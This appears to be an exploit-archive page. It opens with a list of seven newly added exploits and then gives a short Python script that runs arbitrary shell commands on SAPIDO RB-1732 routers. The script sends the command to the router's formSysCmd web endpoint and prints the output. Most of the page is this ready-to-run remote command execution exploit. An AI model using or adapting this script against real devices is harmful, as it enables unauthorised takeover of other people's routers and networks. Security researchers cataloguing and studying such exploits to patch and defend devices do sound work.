
7 changes to exploits/shellcodes SuperDoctor5 - 'NRPE' Remote Code Execution SAPIDO RB-1732 - Remote Command Execution Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution AZADMIN CMS 1.0 - SQL Injection BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal WordPress Plugin iLive 1.0.4 - Cross-Site Scripting WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting
22 lines
No EOL
785 B
Python
Executable file
22 lines
No EOL
785 B
Python
Executable file
# Exploit Title: SAPIDO RB-1732 command line execution
|
|
# Date: 2019-6-24
|
|
# Exploit Author: k1nm3n.aotoi
|
|
# Vendor Homepage: http://www.sapido.com.tw/
|
|
# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
|
|
# Version: RB-1732 V2.0.43
|
|
# Tested on: linux
|
|
|
|
|
|
import requests
|
|
import sys
|
|
|
|
def test_httpcommand(ip, command):
|
|
my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
|
|
r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
|
|
content = r.text
|
|
content = content[
|
|
content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
|
|
content.rfind('</textarea>')]
|
|
return content
|
|
|
|
print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:])) |